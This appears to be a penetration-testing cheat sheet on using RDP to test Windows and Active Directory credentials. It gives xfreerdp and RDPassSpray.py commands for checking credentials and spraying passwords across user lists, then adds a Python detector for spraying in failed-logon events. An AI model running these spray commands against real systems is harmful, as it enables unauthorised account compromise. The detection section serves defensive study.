RDP

Use the RDP service to guess Windows-related credentials. Especially useful in an Active Directory environment.


Check Credentials

xfreerdp
xfreerdp /v:<TARGET> +auth-only /d:<DOMAIN> /u:<USER> /p:<PASSWORD> /sec:nla /cert-ignore 2>&1 | grep freerdp_set_last_error

Understand results:

| Output | Meaning |
|---|---|
| (no output) | Good credentials, RDP access |
| ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D] | Good credentials, no RDP access |
| ERRCONNECT_LOGON_FAILURE [0x00020014] | Wrong credentials |

RDPassSpray.py
RDPassSpray.py -t <TARGET> -d <DOMAIN> -u <USER> -p <PASSWORD>

Source: github.com/xFreed0m/RDPassSpray

Note

Logs are written to $INSTALLDIR/RDPassSpray.<date>.log

Password Spray

RDPassSpray.py
RDPassSpray.py -t <TARGET> -d <DOMAIN> -U </path/to/user/file> -p <PASSWORD>

Source: github.com/xFreed0m/RDPassSpray

Note

Logs are written to $INSTALLDIR/RDPassSpray.<date>.log
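
Seen from the defending side, the spray above shows up as failed logons against many different accounts from one source within a short time. The following is an added example (not from the original page or the RDPassSpray project) that flags that pattern in Windows Security event 4625 records; the parsed record layout, the sample events, and the thresholds are assumptions constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: failed logons (Security event 4625) already parsed into
# (timestamp, source IP, target account). NLA failures are logged as logon type 3.
SAMPLE_EVENTS = [
    ("2024-05-01T09:00:01", "10.0.0.50", "alice"),
    ("2024-05-01T09:00:03", "10.0.0.50", "bob"),
    ("2024-05-01T09:00:05", "10.0.0.50", "carol"),
    ("2024-05-01T09:00:07", "10.0.0.50", "dave"),
    ("2024-05-01T09:00:09", "10.0.0.50", "erin"),
    # A user mistyping their own password: many failures, one account.
    ("2024-05-01T09:10:00", "10.0.0.77", "frank"),
    ("2024-05-01T09:10:05", "10.0.0.77", "frank"),
    ("2024-05-01T09:10:10", "10.0.0.77", "frank"),
    # Several accounts from one source, but hours apart: outside the window.
    ("2024-05-01T08:00:00", "10.0.0.90", "gina"),
    ("2024-05-01T11:00:00", "10.0.0.90", "hank"),
    ("2024-05-01T14:00:00", "10.0.0.90", "ivan"),
]


def detect_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """Return {source_ip: sorted accounts} for sources that failed logons
    against at least `min_accounts` distinct accounts within `window`."""
    by_source = defaultdict(list)
    for ts, src, user in events:
        by_source[src].append((datetime.fromisoformat(ts), user.lower()))

    alerts = {}
    for src, rows in by_source.items():
        rows.sort()
        start = 0
        for end in range(len(rows)):
            # Advance the left edge until the span fits inside `window`.
            while rows[end][0] - rows[start][0] > window:
                start += 1
            accounts = {user for _, user in rows[start:end + 1]}
            if len(accounts) >= min_accounts:
                alerts[src] = sorted(accounts)
                break
    return alerts


if __name__ == "__main__":
    for src, accounts in detect_spray(SAMPLE_EVENTS).items():
        print(f"possible password spray from {src}: {len(accounts)} accounts {accounts}")
```

Counting distinct accounts per source, rather than raw failures, keeps a single user retrying their own password from triggering the alert.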
